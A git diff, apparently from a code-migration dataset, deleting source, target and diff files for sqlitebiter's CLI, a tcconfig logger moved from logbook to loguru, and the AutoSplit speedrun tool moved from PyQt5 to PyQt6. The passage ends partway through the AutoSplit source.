-@click.option("--follow-symlinks", is_flag=True, help="Follow symlinks.") -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableFileLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (auto-detect from file extensions in default).", -) -@click.option( - "--encoding", - metavar="ENCODING", - help="Encoding to load files. Auto-detection from files in default.", -) -@click.pass_context -def file(ctx, files, recursive, pattern, exclude, follow_symlinks, format_name, encoding): - """ - Convert tabular data within - CSV/Excel/HTML/JSON/Jupyter Notebook/LDJSON/LTSV/Markdown/Mediawiki/SQLite/SSV/TSV - file(s) or named pipes to a SQLite database file. - """ - - initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - if typepy.is_empty_sequence(files): - logger.error("require at least one file specification.\n\n{}".format(ctx.get_help())) - sys.exit(ExitCode.NO_INPUT) - - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = FileConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - exclude_pattern=exclude, - follow_symlinks=follow_symlinks, - ) - - for file_path in files: - dir_path_obj = path.Path(file_path) - - if not follow_symlinks and dir_path_obj.islink() and dir_path_obj.isdir(): - logger.debug( - "skip symlink to a directory: {} -> {}".format( - dir_path_obj, dir_path_obj.readlink() - ) - ) - continue - - if recursive and dir_path_obj.isdir(): - for file_path_obj in dir_path_obj.walkfiles(pattern): - converter.convert(file_path_obj) - else: - converter.convert(file_path) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("url", type=str) -@click.option( - "-f", - "--format", - "format_name", - type=click.Choice(ptr.TableUrlLoader.get_format_names() + IPYNB_FORMAT_NAME_LIST), - help="Data format to loading (defaults to html).", -) -@click.option( - "-e", - "--encoding", - type=str, - metavar="ENCODING", - help="HTML page read encoding. Defaults to {:s}.".format(Default.ENCODING), -) -@click.option( - "-p", - "--proxy", - type=str, - metavar="PROXY", - help="Specify a proxy in the form [user:passwd@]proxy.server:port.", -) -@click.pass_context -def url(ctx, url, format_name, encoding, proxy): - """ - Scrape tabular data from a URL and convert data to a SQLite database file. - """ - - if typepy.is_empty_sequence(url): - sys.exit(ExitCode.NO_INPUT) - - initialize_logger("{:s} url".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - try: - app_configs = app_config_mgr.load() - except ValueError as e: - logger.debug(msgfy.to_debug_message(e)) - app_configs = {} - - if typepy.is_empty_sequence(encoding): - encoding = app_configs.get(ConfigKey.DEFAULT_ENCODING) - logger.debug("use default encoding: {}".format(encoding)) - - if typepy.is_null_string(proxy): - proxy = app_configs.get(ConfigKey.PROXY_SERVER) - - convert_configs = load_convert_config(logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="url") - - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - converter = UrlConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - format_name=format_name, - encoding=encoding, - proxy=proxy, - ) - - converter.convert(url) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("credentials", type=click.Path(exists=True)) -@click.argument("title", type=str) -@click.pass_context -def gs(ctx, credentials, title): - """ - Convert a spreadsheet in Google Sheets to a SQLite database file. - - CREDENTIALS: OAuth2 Google credentials file. - TITLE: Title of the Google Sheets to convert. - """ - - initialize_logger("{:s} gs".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - con, is_create_db = create_database(ctx.obj[Context.OUTPUT_PATH], ctx.obj[Context.DUP_DATABASE]) - convert_configs = load_convert_config( - logger, ctx.obj[Context.CONVERT_CONFIG], subcommand="file" - ) - - converter = GoogleSheetsConverter( - logger=logger, - con=con, - symbol_replace_value=ctx.obj[Context.SYMBOL_REPLACE_VALUE], - add_pri_key_name=ctx.obj[Context.ADD_PRIMARY_KEY_NAME], - convert_configs=convert_configs, - index_list=ctx.obj.get(Context.INDEX_LIST), - is_type_inference=ctx.obj[Context.TYPE_INFERENCE], - is_type_hint_header=ctx.obj[Context.TYPE_HINT_HEADER], - verbosity_level=ctx.obj.get(Context.VERBOSITY_LEVEL), - ) - - converter.convert(credentials, title) - - sys.exit(finalize(con, converter, is_create_db)) - - -@cmd.command() -@click.pass_context -def configure(ctx): - """ - Configure the following application settings: - - (1) Default encoding to load files. - (2) HTTP/HTTPS proxy server URI (for url sub-command). - - Configurations are written to '~/.sqlitebiter'. - You can remove these settings by deleting '~/.sqlitebiter'. - """ - - initialize_logger("{:s} file".format(PROGRAM_NAME), ctx.obj[Context.LOG_LEVEL]) - - logger.debug("{} configuration file existence: {}".format(PROGRAM_NAME, app_config_mgr.exists)) - - sys.exit(app_config_mgr.configure()) - - -@cmd.command(epilog=COMMAND_EPILOG) -@click.argument("shell", type=click.Choice(["bash", "zsh"])) -@click.pass_context -def completion(ctx, shell): - """ - A helper command to setup command completion. - - To setup for bash: - - sqlitebiter completion bash >> ~/.bashrc - - To setup for zsh: - - sqlitebiter completion zsh >> ~/.zshrc - """ - - if shell == "bash": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local IFS=$' - ' - COMPREPLY=( $( env COMP_WORDS="${COMP_WORDS[*]}" \ - COMP_CWORD=$COMP_CWORD \ - _SQLITEBITER_COMPLETE=complete $1 ) ) - return 0 - } - - _sqlitebiter_completionetup() { - local COMPLETION_OPTIONS="" - local BASH_VERSION_ARR=(${BASH_VERSION//./ }) - # Only BASH version 4.4 and later have the nosort option. - if [ ${BASH_VERSION_ARR[0]} -gt 4 ] || ([ ${BASH_VERSION_ARR[0]} -eq 4 ] && [ ${BASH_VERSION_ARR[1]} -ge 4 ]); then - COMPLETION_OPTIONS="-o nosort" - fi - - complete $COMPLETION_OPTIONS -F _sqlitebiter_completion sqlitebiter - } - """ - ) - ) - elif shell == "zsh": - click.echo( - dedent( - """\ - _sqlitebiter_completion() { - local -a completions - local -a completions_with_descriptions - local -a response - response=("${(@f)$( env COMP_WORDS="${words[*]}" \ - COMP_CWORD=$((CURRENT-1)) \ - _SQLITEBITER_COMPLETE="complete_zsh" \ - sqlitebiter )}") - - for key descr in ${(kv)response}; do - if [[ "$descr" == "_" ]]; then - completions+=("$key") - else - completions_with_descriptions+=("$key":"$descr") - fi - done - - if [ -n "$completions_with_descriptions" ]; then - _describe -V unsorted completions_with_descriptions -U -Q - fi - - if [ -n "$completions" ]; then - compadd -U -V unsorted -Q -a completions - fi - compstate[insert]="automenu" - } - - compdef _sqlitebiter_completion sqlitebiter; - """ - ) - ) - - -if __name__ == "__main__": - cmd() diff --git a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff b/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff deleted file mode 100644 index df6eed4..0000000 --- a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.diff +++ /dev/null @@ -1,88 +0,0 @@ -diff --git a/tcconfig/_logger.py b/tcconfig/_logger.py - index 9a009be2107f3590dfac23c214a189f900d45ce2..7ba8676b3b9347ef15142bfeba30d611822c154d 100644 - --- a/tcconfig/_logger.py - +++ b/tcconfig/_logger.py -@@ -3,62 +3,44 @@ - """ - - --import logbook -+import sys -+ - import simplesqlite - import subprocrunner -+from loguru import logger - - --def _disable_logger(l): -- try: -- l.disable() -- except AttributeError: -- l.disabled = True # to support Logbook<1.0.0 -- -- --logger = logbook.Logger("tcconfig") --_disable_logger(logger) -+MODULE_NAME = "tcconfig" - -+logger.disable(MODULE_NAME) - --def set_logger(is_enable): -- if is_enable != logger.disabled: -- # logger setting have not changed -- return - -+def set_logger(is_enable, propagation_depth=3): - if is_enable: -- try: -- logger.enable() -- except AttributeError: -- logger.disabled = False # to support Logbook<1.0.0 -+ logger.enable(MODULE_NAME) - else: -- _disable_logger(logger) -+ logger.disable(MODULE_NAME) -+ -+ if propagation_depth <= 0: -+ return - - simplesqlite.set_logger(is_enable) - subprocrunner.set_logger(is_enable) - - - def set_log_level(log_level): -- """ -- Set logging level of this module. The module using -- `logbook `__ module for logging. -- -- :param int log_level: -- One of the log level of the -- `logbook `__. -- Disabled logging if the ``log_level`` is ``logbook.NOTSET``. -- :raises LookupError: If ``log_level`` is an invalid value. -- """ -+ if log_level == "DEBUG": -+ log_format = ( -+ "{level: <8} | " -+ "{name}:{function}:{line} - {message}" -+ ) -+ else: -+ log_format = "[{level}] {message}" - -- # validate log level -- logbook.get_level_name(log_level) -+ logger.remove() -+ logger.add(sys.stderr, colorize=True, format=log_format, level=log_level) - -- if log_level == logger.level: -- return -- -- if log_level == logbook.NOTSET: -+ if log_level == "QUIET": - set_logger(is_enable=False) - else: - set_logger(is_enable=True) -- -- logger.level = log_level -- simplesqlite.set_log_level(log_level) -- subprocrunner.set_log_level(log_level) diff --git a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py b/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py deleted file mode 100644 index c43e62f..0000000 --- a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.source.py +++ /dev/null @@ -1,64 +0,0 @@ -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - - -import logbook -import simplesqlite -import subprocrunner - - -def _disable_logger(l): - try: - l.disable() - except AttributeError: - l.disabled = True # to support Logbook<1.0.0 - - -logger = logbook.Logger("tcconfig") -_disable_logger(logger) - - -def set_logger(is_enable): - if is_enable != logger.disabled: - # logger setting have not changed - return - - if is_enable: - try: - logger.enable() - except AttributeError: - logger.disabled = False # to support Logbook<1.0.0 - else: - _disable_logger(logger) - - simplesqlite.set_logger(is_enable) - subprocrunner.set_logger(is_enable) - - -def set_log_level(log_level): - """ - Set logging level of this module. The module using - `logbook `__ module for logging. - - :param int log_level: - One of the log level of the - `logbook `__. - Disabled logging if the ``log_level`` is ``logbook.NOTSET``. - :raises LookupError: If ``log_level`` is an invalid value. - """ - - # validate log level - logbook.get_level_name(log_level) - - if log_level == logger.level: - return - - if log_level == logbook.NOTSET: - set_logger(is_enable=False) - else: - set_logger(is_enable=True) - - logger.level = log_level - simplesqlite.set_log_level(log_level) - subprocrunner.set_log_level(log_level) diff --git a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py b/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py deleted file mode 100644 index f66f521..0000000 --- a/v1/data/codefile/thombashi@tcconfig__7ba8676__tcconfig$_logger.py.target.py +++ /dev/null @@ -1,46 +0,0 @@ -""" -.. codeauthor:: Tsuyoshi Hombashi -""" - - -import sys - -import simplesqlite -import subprocrunner -from loguru import logger - - -MODULE_NAME = "tcconfig" - -logger.disable(MODULE_NAME) - - -def set_logger(is_enable, propagation_depth=3): - if is_enable: - logger.enable(MODULE_NAME) - else: - logger.disable(MODULE_NAME) - - if propagation_depth <= 0: - return - - simplesqlite.set_logger(is_enable) - subprocrunner.set_logger(is_enable) - - -def set_log_level(log_level): - if log_level == "DEBUG": - log_format = ( - "{level: <8} | " - "{name}:{function}:{line} - {message}" - ) - else: - log_format = "[{level}] {message}" - - logger.remove() - logger.add(sys.stderr, colorize=True, format=log_format, level=log_level) - - if log_level == "QUIET": - set_logger(is_enable=False) - else: - set_logger(is_enable=True) diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff b/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff deleted file mode 100644 index 71a60b5..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.diff +++ /dev/null @@ -1,149 +0,0 @@ -diff --git a/src/AutoSplit.py b/src/AutoSplit.py - index a43c20e4d2b01d4642956e22c666eb23b7e25471..86244b6c190f48200826788fa6af4bd8d26b230f 100644 - --- a/src/AutoSplit.py - +++ b/src/AutoSplit.py -@@ -1,7 +1,7 @@ --#!/usr/bin/python3.7 -+#!/usr/bin/python3.9 - # -*- coding: utf-8 -*- - --from PyQt5 import QtCore, QtGui, QtTest, QtWidgets -+from PyQt6 import QtCore, QtGui, QtTest, QtWidgets - from win32 import win32gui - import sys - import os -@@ -19,11 +19,13 @@ import split_parser - - - class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): -- from hotkeys import beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, setPauseHotkey -- from error_messages import (splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, -- splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, alignmentNotMatchedError, -- multipleResetImagesError, noResetImageThresholdError, resetHotkeyError, pauseHotkeyError, dummySplitsError, settingsNotFoundError, -- invalidSettingsError, oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError) -+ from hotkeys import ( -+ beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, -+ setPauseHotkey) -+ from error_messages import ( -+ splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, -+ splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, -+ oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError, invalidSettingsError) - from settings_file import saveSettings, saveSettingsAs, loadSettings, haveSettingsChanged, getSaveSettingsValues - from screen_region import selectRegion, selectWindow, alignRegion - from menu_bar import about, viewHelp -@@ -136,7 +138,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - - def checkLiveImage(self): - if self.liveimageCheckBox.isChecked(): -- self.timerLiveImage.start(1000 / 60) -+ self.timerLiveImage.start(int(1000 / 60)) - else: - self.timerLiveImage.stop() - self.liveImageFunction() -@@ -161,7 +163,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - - # Convert to set it on the label - qImg = QtGui.QImage(capture, capture.shape[1], capture.shape[0], capture.shape[1] * 3, -- QtGui.QImage.Format_RGB888) -+ QtGui.QImage.Format.Format_RGB888) - pix = QtGui.QPixmap(qImg) - self.liveImage.setPixmap(pix) - -@@ -614,7 +616,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.currentsplitimagefileLabel.setText(' ') -- self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - - # check for reset while delayed and display a counter of the remaining split delay time - delay_start_time = time.time() -@@ -677,7 +679,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - if self.number_of_split_images != self.split_image_number: - # set current split image to none - self.currentsplitimagefileLabel.setText(' ') -- self.currentSplitImage.setAlignment(QtCore.Qt.AlignCenter) -+ self.currentSplitImage.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter) - self.imageloopLabel.setText('Image Loop #: -') - - # if its the last split image and last loop number, disable the skip split button -@@ -878,7 +880,7 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - - qImg = QtGui.QImage(self.split_image_display, self.split_image_display.shape[1], - self.split_image_display.shape[0], self.split_image_display.shape[1] * 3, -- QtGui.QImage.Format_RGB888) -+ QtGui.QImage.Format.Format_RGB888) - self.updateCurrentSplitImage.emit(qImg) - self.currentsplitimagefileLabel.setText(split_image_file) - -@@ -924,48 +926,39 @@ class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - # exit safely when closing the window - def closeEvent(self, event): - if self.haveSettingsChanged(): -- #give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. -- if self.last_successfully_loaded_settings_file_path == None: -- msgBox = QtWidgets.QMessageBox -- warning = msgBox.warning(self, "AutoSplit","Do you want to save changes made to settings file Untitled?", msgBox.Yes | msgBox.No | msgBox.Cancel) -- if warning == msgBox.Yes: -- self.saveSettingsAs() -- sys.exit() -- event.accept() -- if warning == msgBox.No: -- event.accept() -- sys.exit() -- pass -- if warning == msgBox.Cancel: -- event.ignore() -- return -- else: -- msgBox = QtWidgets.QMessageBox -- warning = msgBox.warning(self, "AutoSplit", "Do you want to save the changes made to the settings file " + os.path.basename(self.last_successfully_loaded_settings_file_path) + " ?", msgBox.Yes | msgBox.No | msgBox.Cancel) -- if warning == msgBox.Yes: -- self.saveSettings() -- sys.exit() -- event.accept() -- if warning == msgBox.No: -- event.accept() -- sys.exit() -- pass -- if warning == msgBox.Cancel: -- event.ignore() -- return -+ # give a different warning if there was never a settings file that was loaded successfully, and save as instead of save. -+ msgBox = QtWidgets.QMessageBox -+ settings_file_name = "Untitled" \ -+ if self.last_successfully_loaded_settings_file_path is None \ -+ else os.path.basename(self.last_successfully_loaded_settings_file_path) -+ warning_message = f"Do you want to save changes made to settings file {settings_file_name}?" -+ -+ warning = msgBox.warning( -+ self, -+ "AutoSplit", -+ warning_message, -+ msgBox.StandardButton.Yes | msgBox.StandardButton.No | msgBox.StandardButton.Cancel) -+ -+ if warning == msgBox.StandardButton.Yes: -+ # TODO: Don't close if user cancelled the save -+ self.saveSettingsAs() -+ exit() -+ if warning == msgBox.StandardButton.No: -+ exit() -+ if warning == msgBox.StandardButton.Cancel: -+ event.ignore() - else: - event.accept() - sys.exit() - - -- - def main(): - app = QtWidgets.QApplication(sys.argv) - app.setWindowIcon(QtGui.QIcon('icon.ico')) - w = AutoSplit() - w.setWindowIcon(QtGui.QIcon('icon.ico')) - w.show() -- sys.exit(app.exec_()) -+ sys.exit(app.exec()) - - - if __name__ == '__main__': diff --git a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py b/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py deleted file mode 100644 index 6de181e..0000000 --- a/v1/data/codefile/toufool@auto-split__86244b6__src$AutoSplit.py.source.py +++ /dev/null @@ -1,972 +0,0 @@ -#!/usr/bin/python3.7 -# -*- coding: utf-8 -*- - -from PyQt5 import QtCore, QtGui, QtTest, QtWidgets -from win32 import win32gui -import sys -import os -import cv2 -import time -import ctypes.wintypes -import ctypes -import keyboard -import numpy as np - -import design -import compare -import capture_windows -import split_parser - - -class AutoSplit(QtWidgets.QMainWindow, design.Ui_MainWindow): - from hotkeys import beforeSettingHotkey, afterSettingHotkey, setSplitHotkey, setResetHotkey, setSkipSplitHotkey, setUndoSplitHotkey, setPauseHotkey - from error_messages import (splitImageDirectoryError, splitImageDirectoryNotFoundError, imageTypeError, regionError, regionSizeError, - splitHotkeyError, customThresholdError, customPauseError, alphaChannelError, alignRegionImageTypeError, alignmentNotMatchedError, - multipleResetImagesError, noResetImageThresholdError, resetHotkeyError, pauseHotkeyError, dummySplitsError, settingsNotFoundError, - invalidSettingsError, oldVersionSettingsFileError, noSettingsFileOnOpenError, tooManySettingsFilesOnOpenError) - from settings_file import saveSettings, saveSettingsAs, loadSettings, haveSettingsChanged, getSaveSettingsValues - from screen_region import selectRegion, selectWindow, alignRegion - from menu_bar import about, viewHelp - - myappid = u'mycompany.myproduct.subproduct.version' - ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid) - - # signals - updateCurrentSplitImage = QtCore.pyqtSignal(QtGui.QImage) - startAutoSplitterSignal = QtCore.pyqtSignal() - resetSignal = QtCore.pyqtSignal() - skipSplitSignal = QtCore.pyqtSignal() - undoSplitSignal = QtCore.pyqtSignal() - pauseSignal = QtCore.pyqtSignal() - afterSettingHotkeySignal = QtCore.pyqtSignal() - - def __init__(self, parent=None): - super(AutoSplit, self).__init__(parent) - self.setupUi(self) - - # close all processes when closing window - self.actionView_Help.triggered.connect(self.viewHelp) - self.actionAbout.triggered.connect(self.about) - self.actionSave_Settings.triggered.connect(self.saveSettings) - self.actionSave_Settings_As.triggered.connect(self.saveSettingsAs) - self.actionLoad_Settings.triggered.connect(self.loadSettings) - - # disable buttons upon open - self.undosplitButton.setEnabled(False) - self.skipsplitButton.setEnabled(False) - self.resetButton.setEnabled(False) - - # resize to these width and height so that FPS performance increases - self.RESIZE_WIDTH = 320 - self.RESIZE_HEIGHT = 240 - - # split image folder line edit text - self.splitimagefolderLineEdit.setText('No Folder Selected') - - # Connecting button clicks to functions - self.browseButton.clicked.connect(self.browse) - self.selectregionButton.clicked.connect(self.selectRegion) - self.takescreenshotButton.clicked.connect(self.takeScreenshot) - self.startautosplitterButton.clicked.connect(self.autoSplitter) - self.checkfpsButton.clicked.connect(self.checkFPS) - self.resetButton.clicked.connect(self.reset) - self.skipsplitButton.clicked.connect(self.skipSplit) - self.undosplitButton.clicked.connect(self.undoSplit) - self.setsplithotkeyButton.clicked.connect(self.setSplitHotkey) - self.setresethotkeyButton.clicked.connect(self.setResetHotkey) - self.setskipsplithotkeyButton.clicked.connect(self.setSkipSplitHotkey) - self.setundosplithotkeyButton.clicked.connect(self.setUndoSplitHotkey) - self.setpausehotkeyButton.clicked.connect(self.setPauseHotkey) - self.alignregionButton.clicked.connect(self.alignRegion) - self.selectwindowButton.clicked.connect(self.selectWindow) - - # update x, y, width, and height when changing the value of these spinbox's are changed - self.xSpinBox.valueChanged.connect(self.updateX) - self.ySpinBox.valueChanged.connect(self.updateY) - self.widthSpinBox.valueChanged.connect(self.updateWidth) - self.heightSpinBox.valueChanged.connect(self.updateHeight) - - # connect signals to functions - self.updateCurrentSplitImage.connect(self.updateSplitImageGUI) - self.afterSettingHotkeySignal.connect(self.afterSettingHotkey) - self.startAutoSplitterSignal.connect(self.autoSplitter) - self.resetSignal.connect(self.reset) - self.skipSplitSignal.connect(self.skipSplit) - self.undoSplitSignal.connect(self.undoSplit) - #self.pauseSignal.connect(self.pause) - - # live image checkbox - self.liveimageCheckBox.clicked.connect(self.checkLiveImage) - self.timerLiveImage = QtCore.QTimer() - self.timerLiveImage.timeout.connect(self.liveImageFunction) - - # Default Settings for the region capture - self.hwnd = 0 - self.hwnd_title = '' - self.rect = ctypes.wintypes.RECT() - - #last loaded settings and last successful loaded settings file path to None until we try to load them - self.last_loaded_settings = None - self.last_successfully_loaded_settings_file_path = None - - # find all .pkls in AutoSplit folder, error if there is none or more than 1 - self.load_settings_on_open = True - self.loadSettings() - self.load_settings_on_open = False - - # initialize a few settings options - self.last_saved_settings = None - - self.live_image_function_on_open = True - - # FUNCTIONS - #TODO add checkbox for going back to image 1 when resetting. - def browse(self): - # User selects the file with the split images in it. - self.split_image_directory = str( - QtWidgets.QFileDialog.getExistingDirectory(self, "Select Split Image Directory")) + '\\' - - # If the user doesn't select a folder, it defaults to \. Set it back to whats in the LineEdit, and return - if self.split_image_directory == '\\': - self.split_image_directory = self.splitimagefolderLineEdit.text() - return - - # set the split image folder line to the directory text - self.splitimagefolderLineEdit.setText(self.split_image_directory) - - def checkLiveImage(self): - if self.liveimageCheckBox.isChecked(): - self.timerLiveImage.start(1000 / 60) - else: - self.timerLiveImage.stop() - self.liveImageFunction() - - def liveImageFunction(self): - try: - if win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == True: - self.timerLiveImage.stop() - self.live_image_function_on_open = False - return - - elif win32gui.GetWindowText(self.hwnd) == '' and self.live_image_function_on_open == False: - self.regionError() - self.timerLiveImage.stop() - return - - ctypes.windll.user32.SetProcessDPIAware() - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (240, 180)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - # Convert to set it on the label - qImg = QtGui.QImage(capture, capture.shape[1], capture.shape[0], capture.shape[1] * 3, - QtGui.QImage.Format_RGB888) - pix = QtGui.QPixmap(qImg) - self.liveImage.setPixmap(pix) - - except AttributeError: - pass - - # update x, y, width, height when spinbox values are changed - def updateX(self): - try: - self.rect.left = self.xSpinBox.value() - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateY(self): - try: - self.rect.top = self.ySpinBox.value() - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - except AttributeError: - pass - - def updateWidth(self): - self.rect.right = self.rect.left + self.widthSpinBox.value() - self.checkLiveImage() - - def updateHeight(self): - self.rect.bottom = self.rect.top + self.heightSpinBox.value() - self.checkLiveImage() - - # update current split image. needed this to avoid updating it through the hotkey thread. - def updateSplitImageGUI(self, qImg): - pix = QtGui.QPixmap(qImg) - self.currentSplitImage.setPixmap(pix) - - def takeScreenshot(self): - # error checks - if self.splitimagefolderLineEdit.text() == 'No Folder Selected': - self.splitImageDirectoryError() - return - if os.path.exists(self.splitimagefolderLineEdit.text()) == False: - self.splitImageDirectoryNotFoundError() - return - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - take_screenshot_filename = '001_SplitImage' - - # check if file exists and rename it if it does - # Below starts the FileNameNumber at #001 up to #999. After that it will go to 1000, - # which is a problem, but I doubt anyone will get to 1000 split images... - i = 1 - while os.path.exists(self.split_image_directory + take_screenshot_filename + '.png') == True: - FileNameNumber = (f"{i:03}") - take_screenshot_filename = FileNameNumber + '_SplitImage' - i = i + 1 - - # grab screenshot of capture region - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2BGR) - - # save and open image - cv2.imwrite(self.split_image_directory + take_screenshot_filename + '.png', capture) - os.startfile(self.split_image_directory + take_screenshot_filename + '.png') - - # check max FPS button connects here. - def checkFPS(self): - # error checking - split_image_directory = self.splitimagefolderLineEdit.text() - if split_image_directory == 'No Folder Selected' or split_image_directory is None: - self.splitImageDirectoryError() - return - - split_image_filenames = os.listdir(split_image_directory) - for image in split_image_filenames: - if cv2.imread(self.split_image_directory + image, cv2.IMREAD_COLOR) is None: - self.imageTypeError(image) - return - else: - pass - - if self.hwnd == 0 or win32gui.GetWindowText(self.hwnd) == '': - self.regionError() - return - - if self.width == 0 or self.height == 0: - self.regionSizeError() - return - - # grab first image in the split image folder - split_image_file = split_image_filenames[0] - split_image_path = split_image_directory + split_image_file - split_image = cv2.imread(split_image_path, cv2.IMREAD_COLOR) - split_image = cv2.cvtColor(split_image, cv2.COLOR_BGR2RGB) - split_image = cv2.resize(split_image, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - - # run 10 iterations of screenshotting capture region + comparison. - count = 0 - t0 = time.time() - while count < 10: - - capture = capture_windows.capture_region(self.hwnd, self.rect) - capture = cv2.resize(capture, (self.RESIZE_WIDTH, self.RESIZE_HEIGHT)) - capture = cv2.cvtColor(capture, cv2.COLOR_BGRA2RGB) - - if self.comparisonmethodComboBox.currentIndex() == 0: - similarity = compare.compare_l2_norm(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 1: - similarity = compare.compare_histograms(split_image, capture) - elif self.comparisonmethodComboBox.currentIndex() == 2: - similarity = compare.compare_phash(split_image, capture) - - count = count + 1 - - # calculate FPS - t1 = time.time() - FPS = int(10 / (t1 - t0)) - FPS = str(FPS) - self.fpsvalueLabel.setText(FPS) - - # undo split button and hotkey connect to here - def undoSplit(self): - if self.undosplitButton.isEnabled() == False: - return - - if self.loop_number != 1 and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number - 1 - - elif self.groupDummySplitsCheckBox.isChecked() == True: - for i, group in enumerate(self.split_groups): - if i > 0 and self.split_image_number in group: - self.split_image_number = self.split_groups[i - 1][0] - break - - else: - self.split_image_number = self.split_image_number - 1 - self.loop_number = self.split_image_loop_amount[self.split_image_number] - - self.updateSplitImage() - - return - - # skip split button and hotkey connect to here - def skipSplit(self): - - if self.skipsplitButton.isEnabled() == False: - return - - if self.loop_number < self.split_image_loop_amount[self.split_image_number] and self.groupDummySplitsCheckBox.isChecked() == False: - self.loop_number = self.loop_number + 1 - elif self.groupDummySplitsCheckBox.isChecked() == True: - for group in self.split_groups: - if self.split_image_number in group: - self.split_image_number = group[-1] + 1 - break - else: - self.split_image_number = self.split_image_number + 1 - self.loop_number = 1 - - self.updateSplitImage() - - return - - #def pause(self): - #TODO add what to do when you hit pause hotkey, if this even needs to be done - - def reset(self): - # when the reset button or hotkey is pressed, it will change this text, which will trigger in the autoSplitter function, if running, to abort and change GUI. - self.startautosplitterButton.setText('Start Auto Splitter') - return - - # functions for the hotkeys to return to the main thread from signals and start their corresponding functions - def startAutoSplitter(self): - # if the auto splitter is already running or the button is disabled, don't emit the signal to start it. - if self.startautosplitterButton.text() == 'Running..' or self.startautosplitterButton.isEnabled() == False: - return - else: - self.startAutoSplitterSignal.emit() - - def startReset(self): - self.resetSignal.emit() - - def startSkipSplit(self): - self.skipSplitSignal.emit() - - def 